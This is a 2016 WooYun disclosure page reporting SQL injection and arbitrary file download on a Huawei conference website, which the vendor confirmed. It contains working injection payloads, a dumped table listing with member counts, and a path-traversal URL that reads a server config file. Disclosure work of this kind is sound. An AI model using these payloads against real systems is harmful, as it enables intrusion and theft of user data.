当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205773

漏洞标题:华为某站存在SQL注入(17w用户)&任意文件下载

相关厂商:华为技术有限公司

漏洞作者: 紫霞仙子

提交时间:2016-05-06 20:16

修复时间:2016-06-23 09:40

公开时间:2016-06-23 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-06: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经确认,细节仅向厂商公开
2016-05-19: 细节向核心白帽子及相关领域专家公开
2016-05-29: 细节向普通白帽子公开
2016-06-08: 细节向实习白帽子公开
2016-06-23: 细节向公众公开

简要描述:

我的辣条呢?

详细说明:

POST /web/member/memberSurveyAction!answerQuestion.do HTTP/1.1
Content-Length: 2916
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.huaweihcc.com
Cookie: JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1
Host: www.huaweihcc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
answerList%5b0%5d.optionId=98&answerList%5b0%5d.optionValue=1&answerList%5b0%5d.otherOptionId=105&answerList%5b0%5d.questionId=13&answerList%5b0%5d.surveyId=2&answerList%5b1%5d.optionId=106&answerList%5b1%5d.optionValue=1&answerList%5b1%5d.otherOptionId=128&answerList%5b1%5d.questionId=14&answerList%5b1%5d.surveyId=2&answerList%5b2%5d.optionId=135&answerList%5b2%5d.questionId=15&answerList%5b2%5d.surveyId=2&answerList%5b3%5d.optionId=129&answerList%5b3%5d.optionValue=*&answerList%5b3%5d.otherOptionId=134&answerList%5b3%5d.questionId=16&answerList%5b3%5d.surveyId=2&answerList%5b4%5d.checkBoxOptionId=146&answerList%5b4%5d.checkBoxOptionId=150&answerList%5b4%5d.checkBoxOptionId=151&answerList%5b4%5d.checkBoxOptionId=143&answerList%5b4%5d.checkBoxOptionId=142&answerList%5b4%5d.checkBoxOptionId=145&answerList%5b4%5d.checkBoxOptionId=144&answerList%5b4%5d.checkBoxOptionId=149&answerList%5b4%5d.checkBoxOptionId=155&answerList%5b4%5d.checkBoxOptionId=154&answerList%5b4%5d.checkBoxOptionId=148&answerList%5b4%5d.checkBoxOptionId=152&answerList%5b4%5d.checkBoxOptionId=153&answerList%5b4%5d.checkBoxOptionId=147&answerList%5b4%5d.checkBoxOptionId=139&answerList%5b4%5d.checkBoxOptionId=140&answerList%5b4%5d.checkBoxOptionId=141&answerList%5b4%5d.optionValue=1&answerList%5b4%5d.otherOptionId=155&answerList%5b4%5d.questionId=17&answerList%5b4%5d.surveyId=2&answerList%5b5%5d.optionId=156&answerList%5b5%5d.questionId=18&answerList%5b5%5d.surveyId=2&answerList%5b6%5d.checkBoxOptionId=165&answerList%5b6%5d.checkBoxOptionId=164&answerList%5b6%5d.checkBoxOptionId=166&answerList%5b6%5d.checkBoxOptionId=171&answerList%5b6%5d.checkBoxOptionId=172&answerList%5b6%5d.checkBoxOptionId=173&answerList%5b6%5d.checkBoxOptionId=170&answerList%5b6%5d.checkBoxOptionId=167&answerList%5b6%5d.checkBoxOptionId=168&answerList%5b6%5d.checkBoxOptionId=169&answerList%5b6%5d.optionValue=1&answerList%5b6%5d.otherOptionId=173&answerList%5b6%5d.questionId=19&answerList%5b6%5d.surveyId=2&answerList%5b7%5d.optionId=174&answerList%5b7%5d.questionId=20&answerList%5b7%5d.surveyId=2&answerList%5b8%5d.checkBoxOptionId=178&answerList%5b8%5d.checkBoxOptionId=179&answerList%5b8%5d.checkBoxOptionId=176&answerList%5b8%5d.checkBoxOptionId=177&answerList%5b8%5d.checkBoxOptionId=181&answerList%5b8%5d.checkBoxOptionId=180&answerList%5b8%5d.optionValue=1&answerList%5b8%5d.otherOptionId=181&answerList%5b8%5d.questionId=21&answerList%5b8%5d.surveyId=2&answerList%5b9%5d.optionId=182&answerList%5b9%5d.questionId=22&answerList%5b9%5d.surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample%40email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F

漏洞证明:

---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT 6810 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(6810=6810,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pesh'='Pesh&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample@email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT * FROM (SELECT(SLEEP(5)))xisD) AND 'EqKa'='EqKa&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample@email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F
---
back-end DBMS: MySQL >= 5.0.0
Database: hcc
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| tb_em_answer | 2001934 |
| hcc_member | 173091 |
| tb_em_survey_member | 116952 |
| hcc_member_copy | 51600 |
| hcc_member_bak_hcc2014 | 25989 |
| hcc_mdb_response | 11508 |
| hcc_email_send_record | 10383 |
| hcc_ticket | 9961 |
| hcc_email_send_record_copy | 9024 |
| tb_app_business_log | 4150 |
| hcc_bookagenda | 2971 |
| hcc_test | 2130 |
| hcc_member_copy0503 | 1567 |
| hcc_invite | 1322 |
| tr_em_member_site | 1248 |
| hcc_member_copy0426 | 1182 |
| tr_em_member_site_copy0426 | 998 |
| tr_em_member_site_copy0425 | 946 |
| hcc_webinar | 535 |
| hcc_order | 472 |
| hcc_agenda | 413 |
| hcc_agenda_20140916bak | 413 |
| hcc_speaker | 247 |
| hcc_country | 241 |
| hcc_survey_result | 220 |
| tb_em_option | 185 |
| tb_app_element | 126 |
| hcc_datum | 114 |
| hcc_picture | 91 |
| tr_app_role_menu_bakhcc2014 | 89 |
| hcc_resource_item | 86 |
| hcc_sponsor | 66 |
| tb_app_menu_bakhcc2014 | 50 |
| tb_app_element_group | 37 |
| hcc_cims_group | 29 |
| hcc_media | 29 |
| hcc_article | 26 |
| hcc_datum_catetory | 25 |
| hcc_email_template | 24 |
| tb_em_question | 22 |
| tr_app_role_menu | 21 |
| hcc_conferenceroom | 17 |
| tr_app_user_role | 17 |
| tb_app_menu | 16 |
| tb_app_user | 15 |
| hcc_lab_content | 11 |
| hcc_question_type | 10 |
| hcc_resource | 10 |
| hcc_survey_item | 10 |
| hcc_survey_question | 10 |
| tr_em_site_params | 9 |
| tb_app_params | 8 |
| tb_app_role | 8 |
| tb_em_site | 8 |
| tr_em_user_site | 7 |
| hcc_global_survey | 5 |
| tb_em_params | 5 |
| hcc_lab_handbook | 4 |
| hcc_member_topic | 4 |
| hcc_lab_librarytype | 2 |
| hcc_seq | 2 |
| tb_em_survey | 2 |
| hcc_media_meterial | 1 |
| hcc_survey | 1 |
| tb_app_organization | 1 |
| tb_em_prizes | 1 |
+-----------------------------+---------+


任意文件下载
www.huaweihcc.com/fileDownloadServlet?%20Enterprise%20Cloud%20Service_SAP_Open%20Version.pdf&fileName=../conf/web.xml&isFtp=1&sameName=1&selfilePath=europe/en/

修复方案:

~~

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-09 09:37

厂商回复:

感谢白帽子对华为公司安全的关注,我们已将该漏洞通知了业务部门整改。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-07 10:15 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)

    麻辣烫